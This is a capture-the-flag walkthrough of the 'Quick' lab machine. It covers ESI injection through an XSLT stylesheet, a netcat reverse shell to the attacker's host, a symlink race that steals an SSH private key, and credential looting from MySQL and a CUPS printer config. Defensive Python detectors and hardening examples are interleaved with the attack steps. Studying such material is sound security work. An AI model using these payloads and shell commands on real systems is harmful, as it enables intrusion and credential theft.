QUICK WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-24 15:12 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:12
Completed NSE at 15:12, 0.00s elapsed
Initiating NSE at 15:12
Completed NSE at 15:12, 0.00s elapsed
Initiating NSE at 15:12
Completed NSE at 15:12, 0.00s elapsed
Initiating Ping Scan at 15:12
Scanning 10.10.10.186 [4 ports]
Completed Ping Scan at 15:12, 0.54s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:12
Scanning quick.htb (10.10.10.186) [1000 ports]
Discovered open port 22/tcp on 10.10.10.186
Discovered open port 9001/tcp on 10.10.10.186
Completed SYN Stealth Scan at 15:12, 3.20s elapsed (1000 total ports)
Initiating Service scan at 15:12
Scanning 2 services on quick.htb (10.10.10.186)
Completed Service scan at 15:12, 12.20s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against quick.htb (10.10.10.186)
Retrying OS detection (try #2) against quick.htb (10.10.10.186)
Retrying OS detection (try #3) against quick.htb (10.10.10.186)
Retrying OS detection (try #4) against quick.htb (10.10.10.186)
Retrying OS detection (try #5) against quick.htb (10.10.10.186)
Initiating Traceroute at 15:12
Completed Traceroute at 15:12, 0.61s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:12
Completed Parallel DNS resolution of 2 hosts. at 15:12, 0.61s elapsed
NSE: Script scanning 10.10.10.186.
Initiating NSE at 15:12
Completed NSE at 15:13, 30.88s elapsed
Initiating NSE at 15:13
Completed NSE at 15:14, 60.00s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Nmap scan report for quick.htb (10.10.10.186)
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fb:b0:61:82:39:50:4b:21:a8:62:98:4c:9c:38:82:70 (RSA)
|   256 ee:bb:4b:72:63:17:10:ee:08:ff:e5:86:71:fe:8f:80 (ECDSA)
|_  256 80:a6:c2:73:41:f0:35:4e:5f:61:a7:6a:50:ea:b8:2e (ED25519)
9001/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Quick | Broadband Services
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Uptime guess: 6.804 days (since Fri Jul 17 19:56:43 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   607.59 ms 10.10.14.1
2   607.72 ms quick.htb (10.10.10.186)

NSE: Script Post-scanning.
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.03 seconds
           Raw packets sent: 1130 (53.928KB) | Rcvd: 1089 (48.609KB)

PORT 9001 ENUMERATION

LOGIN PAGE:

The page links to a customer portal that cannot be opened directly in a browser. To reach it we need an HTTP/3 client, so we use the http3-client example that ships with Cloudflare's QUICHE:

https://developers.cloudflare.com/http3/intro/http3-client/

With that client built, the portal is reachable as shown below:

┌─[root@liquid]─[~/Tools/quiche/target/debug/examples]
└──╼ #RUST_LOG="info" ./http3-client https://portal.quick.htb

<html>
<title> Quick | Customer Portal</title>
<h1>Quick | Portal</h1>
<head>
<style>
ul {
  list-style-type: none;
  margin: 0;
  padding: 0;
  width: 200px;
  background-color: #f1f1f1;
}

li a {
  display: block;
  color: #000;
  padding: 8px 16px;
  text-decoration: none;
}

/* Change the link color on hover */
li a:hover {
  background-color: #555;
  color: white;
}
</style>
</head>
<body>
<p> Welcome to Quick User Portal</p>
<ul>
  <li><a href="index.php">Home</a></li>
  <li><a href="index.php?view=contact">Contact</a></li>
  <li><a href="index.php?view=about">About</a></li>
  <li><a href="index.php?view=docs">References</a></li>
</ul>
</html>

The References link points at view=docs, which we fetch next:

┌─[root@liquid]─[~/Tools/quiche/target/debug/examples]
└──╼ #RUST_LOG="info" ./http3-client https://portal.quick.htb?view=docs
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">

<h1>Quick | References</h1>
<ul>
  <li><a href="docs/QuickStart.pdf">Quick-Start Guide</a></li>
  <li><a href="docs/Connectivity.pdf">Connectivity Guide</a></li>
</ul>
</head>
</html>

So let's get the Connectivity PDF:

┌─[root@liquid]─[~/Tools/quiche/target/debug/examples]
└──╼ #RUST_LOG="info" ./http3-client https://portal.quick.htb/docs/Connectivity.pdf > Connectivity.pdf

The PDF contains a password, but logging in also requires an email address.

The site's TESTIMONIALS and CLIENTS sections list people's names and company names.

So we build three wordlists: names (clients.txt), companies (company.txt) and top-level domains (tld.txt).

After that we combine them with this script I wrote:

#!/bin/bash
# Combine every name, company and TLD into a candidate email address.
# Expects clients.txt, company.txt and tld.txt in the current directory;
# reading line by line keeps entries with spaces or globs intact.
while read -r name; do
  while read -r company; do
    while read -r tld; do
      echo "${name}@${company}.${tld}"
    done < tld.txt
  done < company.txt
done < clients.txt

This gives us a list of candidate emails. Fuzzing the login form with each of them (I used Burp Suite) turns up the one valid address:

Elisa@Wink.co.uk : Quick4cc3$$

After logging in with these credentials we see SEARCH and RAISE TICKET options.

Sending the request through Burp, we notice that the application is fronted by ESIGate. A search shows that this can be exploited through ESI injection; the technique is described here:

https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/

We need to host two files, an XML document and an XSL stylesheet, and reference them from an ESI include tag that we submit through the ticket form:

<esi:include src="http://10.10.14.90/b.xml" stylesheet="http://10.10.14.90/a.xsl">
</esi:include>

We put the tag in the ticket's description field and raise the ticket. That returns a ticket number, and searching for that number in the search bar triggers the include.

b.xml is empty; a.xsl carries the payload:

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[touch /tmp/pwned]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>

Only the command inside the CDATA section, touch /tmp/pwned, needs changing.

We send the request three times, changing both the XSL and XML file names each time. A Python HTTP server must also be listening on port 80 on our machine so the target can fetch the stylesheet and the nc binary.

[CDATA[wget http://10.10.14.90/nc]]   (nc is a copy of /usr/bin/nc from our machine)

[CDATA[chmod +x nc]]

[CDATA[./nc 10.10.14.90 9002 -e /bin/bash]]

The final stylesheet looks like this:

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[./nc 10.10.14.90 9002 -e /bin/bash]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>
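From the defender's side, the tell-tale sign of the technique above is an ESI include tag arriving in user-supplied ticket text, especially one that names a stylesheet. The following detection is an added example, not code from the writeup or from ESIGate; the allowlist of hosts and the sample ticket descriptions are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Hosts ESIGate may legitimately include from (constructed allowlist for
# this example; a real deployment would load it from configuration).
ALLOWED_HOSTS = {"portal.quick.htb", "localhost", "127.0.0.1"}

# One <esi:include ...> tag, attributes in any order, optionally self-closing.
ESI_TAG = re.compile(r"<esi:include\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r"""(\w+)\s*=\s*["']([^"']*)["']""")


def find_esi_includes(text):
    """Return one finding per <esi:include> tag in user-supplied text."""
    findings = []
    for tag in ESI_TAG.finditer(text):
        attrs = {k.lower(): v for k, v in ATTR.findall(tag.group(1))}
        src = attrs.get("src", "")
        stylesheet = attrs.get("stylesheet")
        hosts = [urlparse(u).hostname for u in (src, stylesheet) if u]
        # Relative URLs have no host; absolute URLs must point at an allowed host.
        external = any(h is not None and h not in ALLOWED_HOSTS for h in hosts)
        findings.append({
            "src": src,
            "stylesheet": stylesheet,
            # The stylesheet attribute is what turns the include into an XSLT
            # transform (the Xalan path used above), so it is flagged even
            # when the host is allowed.
            "suspicious": external or stylesheet is not None,
        })
    return findings


# Constructed ticket descriptions: a benign one and the payload from this writeup.
TICKETS = [
    "Internet has been slow since Monday, please check the line.",
    '<esi:include src="http://10.10.14.90/b.xml" stylesheet="http://10.10.14.90/a.xsl">'
    "</esi:include>",
]


def suspicious_ticket_ids(tickets):
    """Indices of tickets that carry at least one suspicious ESI include."""
    return [i for i, t in enumerate(tickets)
            if any(f["suspicious"] for f in find_esi_includes(t))]
```

Run the same function over stored ticket descriptions or proxied request bodies; user content should never legitimately contain ESI markup at all, so even an allowed-host include deserves a look.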


Sending the data and triggering the ticket looks like this:

When we trigger the third ticket we get our shell on netcat.

It looks like this:

┌─[root@liquid]─[~/Desktop/HTB/quickC]
└──╼ #rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.90] from (UNKNOWN) [10.10.10.186] 45588
id
uid=1000(sam) gid=1000(sam) groups=1000(sam)
pwd
/home/sam

Here I first tried to get SSH keys by generating them there, but for better access we generate SSH keys on our own machine and copy the public key into sam's authorized_keys after creating the .ssh folder.

sam@quick:~/.ssh$ echo 'ssh-rsa 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 root@liquid' > authorized_keys

GETTING USER ACCESS

Now we just SSH in as sam:

┌─[root@liquid]─[~/Desktop/HTB/quickC]
└──╼ #ssh -i id_rsa sam@10.10.10.186
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jul 24 15:46:22 UTC 2020

  System load:  0.0                Users logged in:                1
  Usage of /:   30.4% of 19.56GB   IP address for ens33:           10.10.10.186
  Memory usage: 17%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    135


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

54 packages can be updated.
28 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Mar 20 01:33:16 2020
sam@quick:~$ ls
esigate-distribution-5.2  nc  nc.exe  user.txt
sam@quick:~$ cat user.txt 
650182418e93bf5a83d054b4841f3616

Next we notice a file named mysql, and that MySQL is listening on localhost, so we need to find its user and password.

Let's look at /var/www, which holds several interesting folders.

Starting with the printer folder, db.php contains the MySQL credentials:

"localhost","db_adm","db_p4ss","quick"

MYSQL

sam@quick:/var/www/printer$ mysql quick -u db_adm -p
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 276
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases
    -> ;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| quick              |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> use quick
Database changed
mysql> show tables;
+-----------------+
| Tables_in_quick |
+-----------------+
| jobs            |
| tickets         |
| users           |
+-----------------+
3 rows in set (0.00 sec)

mysql> select * from users;
+--------------+------------------+----------------------------------+
| name         | email            | password                         |
+--------------+------------------+----------------------------------+
| Elisa        | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+

The password column holds MD5 hashes. Cracking srvadm's MD5 gives a string that is itself a DES crypt hash, and cracking that yields the plaintext:

e626d51f8fbfd1124fdea88396c35d05 > fajxXl5T9swMM > yl51pbx

We have a password now, but we need somewhere to use it, so we look at where the printer application is served.

Running apachectl -S lists the configured virtual hosts:

sam@quick:/var/www/printer$ apachectl -S
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' directive globally to suppress this message
VirtualHost configuration:
*:80                   is a NameVirtualHost
         default server 127.0.1.1 (/etc/apache2/sites-enabled/000-default.conf:1)
         port 80 namevhost 127.0.1.1 (/etc/apache2/sites-enabled/000-default.conf:1)
         port 80 namevhost printerv2.quick.htb (/etc/apache2/sites-enabled/000-default.conf:30)
ServerRoot: "/etc/apache2"
Main DocumentRoot: "/var/www/html"
Main ErrorLog: "/var/log/apache2/error.log"
Mutex default: dir="/var/run/apache2/" mechanism=default 
Mutex mpm-accept: using_defaults
Mutex watchdog-callback: using_defaults
PidFile: "/var/run/apache2/apache2.pid"
Define: DUMP_VHOSTS
Define: DUMP_RUN_CFG
User: name="www-data" id=33 not_used
Group: name="www-data" id=33 not_used

printerv2.quick.htb is only served on localhost port 80, so we forward that port to our machine and enumerate it.

The port forward uses the same SSH key, with a small change to the command:

ssh -i id_rsa -L 80:127.0.0.1:80 sam@10.10.10.186

We log in with the srvadm email and the password recovered above.

Looking at job.php, it takes an IP and a port from the page form.

We give it the IP and port of our own netcat listener: job.php reads a job file from /var/www/jobs and sends its contents to that address. Because it follows whatever is in that directory, this can be abused by pointing the job file at srvadm's SSH key:

#!/bin/bash
# Symlink race against the print-job handler: every file that appears in
# /var/www/jobs is replaced by a symlink of the same name pointing at
# srvadm's private key, so job.php sends the key instead of the job.
shopt -s nullglob            # an empty directory yields no loop iterations
cd /var/www/jobs || exit 1
while true; do
        for file in *; do
                rm -rf "$file"
                ln -s /home/srvadm/.ssh/id_rsa "$file"
        done
done

Here I took help from my Discord friend.

The loop deletes every file the job handler creates and replaces it with a symlink of the same name pointing at /home/srvadm/.ssh/id_rsa.
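The race works because the handler opens whatever path sits in the jobs directory and follows it. The check that closes it is to open the job by name relative to the directory with O_NOFOLLOW, then validate the file actually opened (type and owner) via fstat before reading. The function below is an added example of that hardening, not code from the box's job.php; the temporary directory, file names and "key" contents in demo() are constructed.

```python
import os
import stat
import tempfile


def read_job_file(jobs_dir, name, expected_uid=None):
    """Read a job file without following symlinks or leaving jobs_dir.

    Anything that is not a regular, non-symlink file (optionally owned by
    expected_uid) is refused; this is the check the symlink loop above
    relies on being absent.
    """
    if os.sep in name or name in ("", ".", ".."):
        raise ValueError(f"refusing {name!r}: invalid job name")
    dir_fd = os.open(jobs_dir, os.O_RDONLY | os.O_DIRECTORY)
    try:
        # O_NOFOLLOW: a symlink planted in place of the job fails with ELOOP.
        fd = os.open(name, os.O_RDONLY | os.O_NOFOLLOW, dir_fd=dir_fd)
    except OSError as exc:
        raise ValueError(f"refusing {name!r}: {exc.strerror}") from exc
    finally:
        os.close(dir_fd)
    try:
        st = os.fstat(fd)  # inspect the file actually opened, not the path
        if not stat.S_ISREG(st.st_mode):
            raise ValueError(f"refusing {name!r}: not a regular file")
        if expected_uid is not None and st.st_uid != expected_uid:
            raise ValueError(f"refusing {name!r}: unexpected owner")
    except Exception:
        os.close(fd)
        raise
    with os.fdopen(fd, "rb") as f:  # fdopen now owns and closes fd
        return f.read()


def demo():
    """Constructed scenario: a real job, a planted symlink, a traversal name."""
    with tempfile.TemporaryDirectory() as tmp:
        jobs = os.path.join(tmp, "jobs")
        os.mkdir(jobs)
        secret = os.path.join(tmp, "id_rsa")  # stands in for srvadm's key
        with open(secret, "w") as f:
            f.write("-----BEGIN CONSTRUCTED KEY-----")
        with open(os.path.join(jobs, "job1.txt"), "w") as f:
            f.write("print me")
        os.symlink(secret, os.path.join(jobs, "job2.txt"))
        results = [read_job_file(jobs, "job1.txt", expected_uid=os.getuid())]
        for bad in ("job2.txt", "../id_rsa"):
            try:
                results.append(read_job_file(jobs, bad))
            except ValueError as exc:
                results.append(str(exc))
        return results
```

demo() returns the contents of the genuine job followed by the two refusal messages; a handler written this way would also want the jobs directory itself not to be writable by the web user.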

Our listener then receives the key:

┌─[root@liquid]─[~/Desktop/HTB/quickC]
└──╼ #nc -lnvp 9004
listening on [any] 9004 ...
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----

Here we go with our SSH key.

GETTING 2ND USER ACCESS

Let's SSH in as srvadm:

┌─[✗]─[root@liquid]─[~/Desktop/HTB/quickC]
└──╼ #ssh -i id_rsaadmin srvadm@10.10.10.186
load pubkey "id_rsaadmin": invalid format
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jul 24 18:07:20 UTC 2020

  System load:  0.0                Users logged in:                1
  Usage of /:   30.4% of 19.56GB   IP address for ens33:           10.10.10.186
  Memory usage: 18%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    138


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

54 packages can be updated.
28 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Jul 24 16:29:03 2020 from 10.10.14.90
srvadm@quick:~$ id
uid=1001(srvadm) gid=1001(srvadm) groups=1001(srvadm),999(printers)
srvadm@quick:~$ 

Here we go with our second user.

GETTING ROOT ACCESS

We don't have a password for this user, so we look through the files and folders in the home directory, and that is where the root password turns up.

srvadm@quick:~$ id
uid=1001(srvadm) gid=1001(srvadm) groups=1001(srvadm),999(printers)
srvadm@quick:~$ ls -la
total 36
drwxr-xr-x 6 srvadm srvadm 4096 Mar 20 06:37 .
drwxr-xr-x 4 root   root   4096 Mar 20 02:16 ..
lrwxrwxrwx 1 srvadm srvadm    9 Mar 20 02:38 .bash_history -> /dev/null
-rw-r--r-- 1 srvadm srvadm  220 Mar 20 02:16 .bash_logout
-rw-r--r-- 1 srvadm srvadm 3771 Mar 20 02:16 .bashrc
drwx------ 5 srvadm srvadm 4096 Mar 20 06:20 .cache
drwx------ 3 srvadm srvadm 4096 Mar 20 02:38 .gnupg
drwxrwxr-x 3 srvadm srvadm 4096 Mar 20 06:37 .local
-rw-r--r-- 1 srvadm srvadm  807 Mar 20 02:16 .profile
drwx------ 2 srvadm srvadm 4096 Mar 20 02:38 .ssh
srvadm@quick:~$ cd .cache/
srvadm@quick:~/.cache$ ls
conf.d  logs  motd.legal-displayed  packages
srvadm@quick:~/.cache$ cd conf.d/
srvadm@quick:~/.cache/conf.d$ ls
cupsd.conf  printers.conf
srvadm@quick:~/.cache/conf.d$ cat printers.conf 
# Printer configuration file for CUPS v2.3.0
# Written by cupsd on 2020-02-18 17:11
# DO NOT EDIT THIS FILE WHEN CUPSD IS RUNNING
NextPrinterId 5

<------>


MakeModel KONICA MINOLTA C554SeriesPS(P)
DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer
State Idle


<------>

The DeviceURI embeds a URL-encoded credential; decoding it gives the password:

%26ftQ4K3SGde8%3F >> &ftQ4K3SGde8?
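Credentials stored in a printer's DeviceURI are exactly what a defender should be auditing for. The scanner below is an added example, not a CUPS tool or code from the writeup; it parses a constructed printers.conf excerpt (printer names and the second printer are made up, the first DeviceURI is the one shown above) and returns the percent-decoded userinfo of every entry that carries one.

```python
from urllib.parse import unquote, urlparse

# Constructed printers.conf excerpt: the DeviceURI from the writeup plus a
# second printer without userinfo. Printer names are made up.
PRINTERS_CONF = """\
# Printer configuration file for CUPS v2.3.0
NextPrinterId 5
<Printer konica>
MakeModel KONICA MINOLTA C554SeriesPS(P)
DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer
State Idle
</Printer>
<Printer plain>
DeviceURI ipp://printer.internal:631/ipp/print
State Idle
</Printer>
"""


def find_embedded_credentials(conf_text):
    """Return (printer, host, username, password) for every DeviceURI that
    carries userinfo. CUPS stores the userinfo percent-encoded, so '@' in
    the username and '&' / '?' in the password appear as %40, %26 and %3F."""
    hits = []
    printer = None
    for line in conf_text.splitlines():
        line = line.strip()
        if line.startswith("<Printer ") or line.startswith("<DefaultPrinter "):
            printer = line.split(None, 1)[1].rstrip(">")
        elif line.startswith("DeviceURI "):
            uri = urlparse(line.split(None, 1)[1])
            if uri.username is None:
                continue  # no userinfo, nothing embedded
            hits.append((printer, uri.hostname,
                         unquote(uri.username), unquote(uri.password or "")))
    return hits
```

Any hit is a credential readable by whoever can read the file, which on this box included a copy cached under a user's home directory rather than only /etc/cups.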

LET'S SU TO ROOT AND GET THE ROOT FLAG!

srvadm@quick:~/.cache/conf.d$ su root
Password: 
root@quick:/home/srvadm/.cache/conf.d# cd
root@quick:~# pwd
/root
root@quick:~# id
uid=0(root) gid=0(root) groups=0(root)
root@quick:~# cat root.txt
6c11493e99685f709a1fc2ff03a4404a
root@quick:~# 

Here we go with our root flag!!

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
